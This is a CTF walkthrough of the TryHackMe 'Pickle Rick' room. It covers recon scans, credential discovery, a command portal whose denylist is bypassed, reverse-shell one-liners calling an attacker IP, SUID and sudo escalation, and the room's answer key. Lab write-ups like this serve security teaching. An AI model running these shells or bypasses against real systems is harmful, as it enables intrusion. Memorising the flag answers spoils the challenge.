THM Room: Pickle Rick CTF


Last updated 2 years ago


Overview


This Rick and Morty themed challenge requires you to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Deploy the virtual machine on this task and explore the web application: MACHINE_IP

You can also access the web app using the following link: https://lab_web_url.p.thmlabs.com/ (this will update when the machine has fully started)

Information Gathering

export ip=10.10.12.75

Scanning

Nmap Scan Result

$ nmap -sTV -O -sC $ip

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Operating System: Ubuntu

Nikto Scan

$ nikto -host http://$ip

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.12.75
+ Target Hostname:    10.10.12.75
+ Target Port:        80
+ Start Time:         2021-05-02 01:37:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7889 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-05-02 02:31:46 (GMT-4) (3267 seconds)
------------------------------------------------------------------

Enumeration

Two ports are open: 22 (SSH) and 80 (HTTP). SSH provides remote login and management of the server, but it needs either a valid username and password or a private key, and we have neither yet, so we move on to HTTP. HTTP is the protocol a web server uses to serve pages; the scan identifies Apache, so the host is serving web content we can enumerate.

Browsing to http://10.10.12.75 shows a static page. Viewing its source (CTRL + U in Firefox) reveals an HTML comment containing a username:

Username: R1ckRul3s

Websites often have a robots.txt file that tells search-engine crawlers which paths not to crawl. This site has one, and its entire content is the following:

Wubbalubbadubdub

That is not robots.txt syntax, which looks like this:

User-agent: *
Disallow: /

A file that holds a single word instead of crawler directives is probably something else, so we note it down for later.

The page links to no other content, so to widen the attack surface we do directory fuzzing, also called content discovery: finding directories and files that exist under the web root but are not referenced anywhere on the site. We take a wordlist of common directory and file names, send one request per candidate (optionally with extensions such as .php and .txt appended) and keep the paths that do not return 404. Tools such as ffuf, gobuster and Burp Suite automate this.

Directory Fuzzing

$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://$ip/FUZZ -e .php,.txt

/assets
robots.txt 
login.php

The ffuf run found /assets, a directory holding the site's CSS and JavaScript files, robots.txt, and login.php, which Nikto also reported. Let's visit login.php.

It is a login form asking for a username and password. We have a username but no password. We could brute-force it, but first let's try the string from robots.txt as the password.

It works: the login succeeds and redirects us to /portal.php, a command execution portal that runs system commands for us. We love to see this!

Running ls lists the current directory and shows a file named Sup3rS3cretPickl3Ingred.txt. Using cat to read it returns no output at all, which suggests the portal denylists certain commands. Other commands can display a file's contents, for example more, head, tail and less, so we try each in turn. One of them works, and we get the first ingredient to submit to TryHackMe.
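To make the denylist behaviour concrete, here is an added example of mine, not the room's portal.php (whose real filter is not shown on this page): a constructed model of a portal that rejects any command containing a blocked word and otherwise hands the raw string to sh -c. It shows why that check is weak: an alternative reader such as tail is simply not on the list, and even the blocked word gets through when split with empty quotes, because the filter sees the literal string c""at while the shell sees cat. The allowlist version beside it is the fix: only a safe character set and a fixed set of verbs are accepted. The blocked word list, the function names and the allowed verb set are assumptions.

```shell
#!/bin/sh
# Added example: a constructed model of a command portal that denylists
# commands by substring. Not the room's portal.php; the blocked word list,
# the function names and the allowed verb set are assumptions.
BLOCKED="cat"

# naive_filter CMD: the weak check. Prints "blocked" if any denylisted word
# appears anywhere in the command string, otherwise "allowed".
naive_filter() {
  for word in $BLOCKED; do
    case "$1" in
      *"$word"*) echo blocked; return 0 ;;
    esac
  done
  echo allowed
}

# portal_exec CMD: what the vulnerable portal does, filter then hand the
# raw string to sh -c. Blocked commands fail silently, as observed in the room.
portal_exec() {
  if [ "$(naive_filter "$1")" = blocked ]; then
    return 1
  fi
  sh -c "$1"
}

# allowlist_filter CMD: the hardened check. Only a small safe character set
# is accepted (so quotes, ;, |, &, $, backticks and redirections never reach
# the shell), and the first word must be one of a fixed set of verbs.
allowlist_filter() {
  if printf '%s\n' "$1" | grep -q '[^A-Za-z0-9 ./_-]'; then
    echo blocked; return 0
  fi
  set -f            # no globbing while we split the string into words
  set -- $1
  set +f
  case "$1" in
    ls|id|uptime|whoami) echo allowed ;;
    *) echo blocked ;;
  esac
}

# Demonstration on a constructed file (not the room's ingredient file)
demo() {
  tmp=$(mktemp)
  echo 'constructed sample content' > "$tmp"
  echo "naive  cat   : $(naive_filter "cat $tmp")"        # blocked
  echo "naive  tail  : $(naive_filter "tail $tmp")"       # allowed: other reader
  echo "naive  c\"\"at: $(naive_filter "c\"\"at $tmp")"   # allowed: quoting bypass
  echo "portal c\"\"at: $(portal_exec "c\"\"at $tmp")"    # still prints the file
  echo "allow  tail  : $(allowlist_filter "tail $tmp")"   # blocked
  echo "allow  ls;id : $(allowlist_filter 'ls;id')"       # blocked
  echo "allow  ls    : $(allowlist_filter 'ls /tmp')"     # allowed
  rm -f "$tmp"
}
demo
```

The lesson generalises past this room: a filter that inspects the command string cannot reason about how the shell will parse it, so the only robust options are an allowlist of exact verbs with the arguments validated, or not invoking a shell at all.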

Getting reverse shell

Note: a reverse shell is not needed to solve this room; I use one here for the sake of methodology.

We have command execution, so let's try to get a reverse shell. Start a listener on your attacking machine with netcat, pwncat or whatever you prefer; I use netcat. The listener port must match the port in the payload you send (the payloads below use 5555 and the awk one uses 9001, so adjust one or the other).

nc -lvnp 4444

Unfortunately, none of the following basic reverse shell payloads gave me a connection. (One likely reason for the first one: >& and /dev/tcp are bash features, and a command portal typically passes the string to /bin/sh, which on Ubuntu is dash; wrapping the payload as bash -c '...' avoids that.)

1) bash -i >& /dev/tcp/10.8.186.33/5555 0>&1

2) php -r '$sock=fsockopen("10.8.186.33",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

3) nc -e /bin/sh 10.8.186.33 5555

4) rm -f /tmp/p; mknod /tmp/p p && nc 10.8.186.33 5555 0</tmp/p | /bin/sh 1>/tmp/p

After trying other payloads I eventually got a connection back with the following awk one-liner. Note that |& is a gawk coprocess operator, so this only works where awk is gawk:

awk 'BEGIN {s = "/inet/tcp/0/10.8.186.33/9001"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

This gives me a connection back, but it is not a normal shell: each line you type is run by awk as a separate sh -c coprocess and its output is sent back, so there is no TTY, no persistent working directory (a cd does not carry over to the next command) and no job control. In effect it is the web shell moved into your terminal, minus the portal's command denylist, so cat, more and head all work here.
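Rather than trying payloads blind, a practitioner first asks the target what it has. The following is an added example, not from the writeup, meant to be sent through the command portal or run from any shell already on the box: it reports which reverse-shell interpreters and netcat variants exist and which flavour they are, since that decides the payload (bash with /dev/tcp, nc with or without -e, gawk for the |& coprocess trick). The candidate tool names are the usual suspects; which of them exist is whatever the target answers, and the -e and gawk checks are heuristics on help and version output.

```shell
#!/bin/sh
# Added example (not from the writeup): probe which reverse-shell primitives a
# target has before choosing a payload. Run it through the command portal or
# from any shell already on the box.

# has_tool NAME: succeeds if NAME is on PATH
has_tool() { command -v "$1" >/dev/null 2>&1; }

# probe_revshell_tools: one line per candidate, "name<TAB>path<TAB>note".
# The note records the flavour detail that decides which payload works.
probe_revshell_tools() {
  for tool in sh bash nc ncat socat php python python3 perl gawk awk busybox; do
    if ! has_tool "$tool"; then
      printf '%s\tmissing\t-\n' "$tool"
      continue
    fi
    path=$(command -v "$tool")
    note=-
    case "$tool" in
      sh)
        # /bin/sh is dash on Ubuntu: no >& and no /dev/tcp, so bash-only
        # payloads must be wrapped in bash -c '...'
        note="resolves to $(readlink -f "$path" 2>/dev/null || echo "$path")" ;;
      bash)
        note='has /dev/tcp and >& (Debian/Ubuntu builds); wrap payloads in bash -c' ;;
      nc)
        # heuristic: traditional nc, ncat and busybox nc all document -e in -h
        if nc -h 2>&1 </dev/null | grep -qiE -- '-e,? +(prog|--exec|cmd)'; then
          note='supports -e'
        else
          note='no -e: use the mkfifo/mknod pipe variant'
        fi ;;
      awk)
        # gawk and mawk both accept -W version; only gawk has the |& operator
        if awk -W version </dev/null 2>/dev/null | grep -q GNU; then
          note='is gawk: |& coprocess payload works'
        else
          note='not gawk: the |& coprocess payload will fail'
        fi ;;
    esac
    printf '%s\t%s\t%s\n' "$tool" "$path" "$note"
  done
}

probe_revshell_tools
```

Run the probe first, then pick the one payload family the output supports instead of cycling through all of them; on a box where awk is mawk, for example, the one-liner above would never have connected.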

Now we look for the other ingredients. Checking the home directories, /home/rick holds the second ingredient file.

Note: the file name, second ingredients, contains a space, so quote it when reading it:

cat /home/rick/"second ingredients"

Next, list every binary with the SUID bit set. These run with their owner's privileges rather than the caller's, so a misconfigured one can give elevated access:

find / -perm /4000 2>/dev/null

The result:

/snap/core/5742/bin/mount
/snap/core/5742/bin/ping
/snap/core/5742/bin/ping6
/snap/core/5742/bin/su
/snap/core/5742/bin/umount
/snap/core/5742/usr/bin/chfn
/snap/core/5742/usr/bin/chsh
/snap/core/5742/usr/bin/gpasswd
/snap/core/5742/usr/bin/newgrp
/snap/core/5742/usr/bin/passwd
/snap/core/5742/usr/bin/sudo
/snap/core/5742/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/5742/usr/lib/openssh/ssh-keysign
/snap/core/5742/usr/lib/snapd/snap-confine
/snap/core/5742/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/ntfs-3g
/bin/ping
/bin/su
/bin/ping6
/bin/mount
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

Nothing here stands out as an easy escalation: the /snap/core entries are copies inside the mounted core snap images rather than the system's own binaries, and the rest are stock Ubuntu SUID binaries. The next check is sudo -l, which shows what the current user may run through sudo, and here it reports that we can run any command as root with NOPASSWD. Knowing that, we list the contents of /root:

sudo ls -al /root

The listing shows a file named 3rd.txt, so read it the same way to get the third ingredient:

sudo cat /root/3rd.txt
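Two small helpers for this stage, added here as an example and not taken from the writeup. The first trims the find output to the host's own SUID binaries, since the /snap/core/<rev>/ entries are files inside mounted snap images and only pad the list. The second runs sudo -l with -n, which matters in a shell like the awk one above that has no TTY: without -n, sudo would try to prompt for a password and the command would hang with no output, whereas -n fails immediately and prints the NOPASSWD rules when they exist. The sample list is a constructed subset of the page's find output; either -perm /4000 or -perm -4000 produces it, and adding -type f drops directories.

```shell
#!/bin/sh
# Added example, not from the writeup: triage helpers for the SUID and sudo
# steps that behave well inside a non-interactive shell (no TTY).

# suid_on_host: read `find / -perm -4000 -type f` output on stdin and drop the
# /snap/ entries, which are files inside read-only snap images rather than the
# host's own binaries, leaving only what actually runs as root on this box.
suid_on_host() {
  grep -v '^/snap/' | LC_ALL=C sort -u
}

# sudo_rules: sudo -l without a TTY would try to prompt for a password and
# hang the web/awk shell; -n makes it fail immediately instead. When the
# user has NOPASSWD rules, they are printed (e.g. "(ALL) NOPASSWD: ALL").
sudo_rules() {
  if ! command -v sudo >/dev/null 2>&1; then
    echo 'sudo: not installed'
    return 1
  fi
  sudo -n -l 2>&1
}

# Constructed sample: a subset of the find output shown in the writeup
SAMPLE='/snap/core/5742/bin/su
/snap/core/5742/usr/bin/sudo
/snap/core/6350/bin/su
/bin/su
/usr/bin/sudo
/usr/bin/pkexec'

echo "SUID binaries on the host (from the constructed sample):"
printf '%s\n' "$SAMPLE" | suid_on_host
echo "sudo rules for $(id -un 2>/dev/null || echo unknown):"
sudo_rules || true
```

On the real box, pipe the live find output into suid_on_host instead of the sample, and check each remaining binary against what you know about it before spending time on it; here sudo_rules is the one that pays off.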

That gives us all three ingredients:

Q: What is the first ingredient Rick needs?

A: mr. meeseek hair

Q: What's the second ingredient Rick needs?

A: 1 jerry tear

Q: What's the final ingredient Rick needs?

A: fleeb juice